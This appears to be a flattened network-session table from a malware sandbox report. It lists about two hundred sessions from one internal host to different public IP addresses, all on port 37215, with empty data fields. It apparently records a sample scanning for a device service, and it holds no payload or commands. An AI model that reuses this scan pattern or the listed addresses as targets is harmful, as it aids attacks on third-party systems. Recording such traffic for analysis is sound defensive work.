                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5113192.168.2.1558108197.214.109.11137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5114192.168.2.1538276168.153.71.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5115192.168.2.1553752197.20.202.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5116192.168.2.1540652157.29.106.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5117192.168.2.1538182197.50.97.14437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5118192.168.2.1560936197.235.0.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5119192.168.2.1543580157.64.167.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5120192.168.2.155375041.95.103.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5121192.168.2.155421435.66.134.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5122192.168.2.1545086108.15.225.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5123192.168.2.1537124157.247.89.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5124192.168.2.155104641.90.113.22537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5125192.168.2.1546474157.117.205.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5126192.168.2.1552724157.180.160.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5127192.168.2.1552546172.52.97.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5128192.168.2.1559862157.66.58.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5129192.168.2.154603052.242.163.8037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5130192.168.2.154957824.47.43.17337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5131192.168.2.1556070157.119.45.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5132192.168.2.1537180157.86.211.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5133192.168.2.154573241.128.45.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5134192.168.2.1557406157.238.106.17237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5135192.168.2.1534460144.120.190.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5136192.168.2.1546988197.204.149.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5137192.168.2.1544430115.137.33.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5138192.168.2.153757631.86.72.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5139192.168.2.1559262157.113.104.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5140192.168.2.1535938157.216.0.23637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5141192.168.2.153294241.85.239.18637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5142192.168.2.1554002197.130.142.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5143192.168.2.1558560157.15.31.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5144192.168.2.155517476.152.38.16737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5145192.168.2.155651259.63.229.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5146192.168.2.154675441.243.141.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5147192.168.2.1547396144.53.249.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5148192.168.2.154409441.107.21.8637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5149192.168.2.155238041.49.184.24237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5150192.168.2.153932675.242.29.18937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5151192.168.2.154193051.133.205.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5152192.168.2.156035241.201.124.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5153192.168.2.153925260.160.201.6537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5154192.168.2.155078638.135.142.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5155192.168.2.1549826197.99.13.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5156192.168.2.1550920116.73.126.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5157192.168.2.1536934197.186.255.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5158192.168.2.1555106197.74.179.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5159192.168.2.1556946196.219.254.13137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5160192.168.2.153333841.159.36.8537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5161192.168.2.1558266118.10.49.13437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5162192.168.2.1546750157.50.98.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5163192.168.2.1533230120.83.189.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5164192.168.2.15486002.157.29.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5165192.168.2.1550374197.24.217.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5166192.168.2.1536654197.204.244.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5167192.168.2.1534076157.124.56.14637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5168192.168.2.1537618197.88.61.8837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5169192.168.2.1535986157.202.188.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5170192.168.2.1542404157.117.101.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5171192.168.2.1535772197.74.109.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5172192.168.2.1551028213.187.91.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5173192.168.2.1540894197.109.55.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5174192.168.2.1559220157.110.100.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5175192.168.2.1540692157.100.57.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5176192.168.2.154949441.164.194.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5177192.168.2.1549272157.49.7.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5178192.168.2.1547920161.24.150.3637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5179192.168.2.1556268157.174.21.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5180192.168.2.1552214197.191.223.21937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5181192.168.2.153995041.241.157.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5182192.168.2.155743691.53.3.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5183192.168.2.1548040150.218.250.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5184192.168.2.1556890197.200.149.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5185192.168.2.1546448157.249.25.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5186192.168.2.1540188197.179.81.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5187192.168.2.1533728157.56.149.16137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5188192.168.2.1540818197.137.192.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5189192.168.2.155106817.147.22.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5190192.168.2.1539966195.166.164.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5191192.168.2.1552214157.22.234.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5192192.168.2.1560286197.143.40.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5193192.168.2.1537800192.230.99.15237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5194192.168.2.1544988102.75.121.8037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5195192.168.2.1543598157.184.222.12937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5196192.168.2.1539324182.62.83.2637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5197192.168.2.1558664157.0.173.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5198192.168.2.155518641.22.49.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5199192.168.2.154913041.2.200.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5200192.168.2.1560334197.73.37.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5201192.168.2.1533844197.146.2.7737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5202192.168.2.155799241.240.54.19137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5203192.168.2.1549690157.148.124.5037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5204192.168.2.1558566157.96.195.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5205192.168.2.1559352170.64.204.18137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5206192.168.2.1553378197.161.16.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5207192.168.2.1535992157.229.137.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5208192.168.2.155620041.16.41.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5209192.168.2.15356489.172.104.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5210192.168.2.1559894157.105.226.11837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5211192.168.2.1538226197.53.202.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5212192.168.2.1556360197.14.96.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5213192.168.2.156021041.125.141.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5214192.168.2.1535038157.246.137.25437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5215192.168.2.1535964197.187.250.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5216192.168.2.1536096114.245.247.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5217192.168.2.1557486157.53.186.6037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5218192.168.2.155747441.30.37.23137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5219192.168.2.1542384157.127.140.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5220192.168.2.1558344197.147.212.13637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5221192.168.2.153404238.12.55.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5222192.168.2.1541448197.17.61.9437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5223192.168.2.1543694118.197.193.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5224192.168.2.1539024197.113.30.21637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5225192.168.2.155009841.215.85.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5226192.168.2.1556782187.80.104.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5227192.168.2.1550708157.0.204.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5228192.168.2.1536374197.91.83.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5229192.168.2.1533278197.234.18.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5230192.168.2.1533784119.39.16.15837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5231192.168.2.1544588197.40.149.1737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5232192.168.2.153579441.43.82.11337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5233192.168.2.155946441.33.162.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5234192.168.2.1554830188.221.246.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5235192.168.2.1533014157.161.18.9637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5236192.168.2.1540846197.116.72.11237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5237192.168.2.1542596220.177.168.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5238192.168.2.1554536197.143.121.23937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5239192.168.2.1545904157.179.124.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5240192.168.2.1553272157.167.229.1237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5241192.168.2.1550464197.91.231.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5242192.168.2.1542268197.223.237.20237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5243192.168.2.154477241.84.241.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5244192.168.2.155234441.160.243.6237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5245192.168.2.1557902197.190.74.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5246192.168.2.1559918157.138.116.22837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5247192.168.2.155965041.95.124.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5248192.168.2.154752841.231.239.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5249192.168.2.1556606157.242.162.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5250192.168.2.1540102197.51.110.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5251192.168.2.1553596157.118.249.15937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5252192.168.2.154639041.127.123.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5253192.168.2.156094041.66.86.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5254192.168.2.153713441.218.187.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5255192.168.2.1560810157.239.250.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5256192.168.2.155380841.136.36.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5257192.168.2.1547822197.59.131.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5258192.168.2.1534274157.139.36.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5259192.168.2.155726441.62.132.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5260192.168.2.155746238.97.238.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5261192.168.2.1545618197.100.10.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5262192.168.2.1539214157.138.72.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5263192.168.2.1554958157.238.33.2837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5264192.168.2.155377287.211.146.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5265192.168.2.155485498.115.237.12637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5266192.168.2.1536058157.212.128.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5267192.168.2.154928041.14.202.14337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5268192.168.2.1543194157.228.228.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5269192.168.2.1554118157.1.51.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5270192.168.2.154617441.190.173.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5271192.168.2.156088641.199.100.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5272192.168.2.154928641.215.218.9137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5273192.168.2.155232441.124.82.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5274192.168.2.1557112157.218.200.25137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5275192.168.2.1538494157.123.175.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5276192.168.2.154956641.236.88.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5277192.168.2.1536842197.14.168.16537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5278192.168.2.1554088157.181.116.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5279192.168.2.153907441.114.125.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5280192.168.2.155004894.141.215.18737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5281192.168.2.1535922157.143.119.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5282192.168.2.1550910197.154.131.20337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5283192.168.2.155595295.37.48.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5284192.168.2.1546620197.247.195.19637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5285192.168.2.1560966157.199.98.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5286192.168.2.154528414.15.255.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5287192.168.2.154788041.40.109.337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5288192.168.2.1558668157.174.56.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5289192.168.2.1548324157.246.190.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5290192.168.2.154070241.174.78.9237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5291192.168.2.1551742157.109.57.21337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5292192.168.2.1540034157.146.141.9537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5293192.168.2.153664463.129.179.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5294192.168.2.1543504157.80.171.21537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5295192.168.2.1554850157.221.2.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5296192.168.2.1545964157.150.44.10737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5297192.168.2.1536074197.128.106.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5298192.168.2.155173287.188.251.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5299192.168.2.1544168157.235.177.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5300192.168.2.1535502157.142.163.7237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5301192.168.2.1538522197.172.219.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5302192.168.2.155574264.88.13.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5303192.168.2.154718441.110.109.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5304192.168.2.1555762197.252.133.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5305192.168.2.1550682197.222.110.5937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5306192.168.2.1539828197.163.2.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5307192.168.2.1558986157.24.131.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5308192.168.2.1548710157.173.93.24837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5309192.168.2.154228687.205.10.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5310192.168.2.1553008197.86.82.7637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5311192.168.2.1552112197.206.89.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5312192.168.2.1539194134.131.174.7837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5313192.168.2.155243841.44.124.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5314192.168.2.1553398110.132.112.14937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5315192.168.2.155313041.165.205.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5316192.168.2.1553814157.57.246.1137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5317192.168.2.156025441.71.21.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5318192.168.2.154068441.11.243.11037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5319192.168.2.1548720197.139.80.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5320192.168.2.154173481.6.194.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          5321192.168.2.1559936195.145.67.7037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
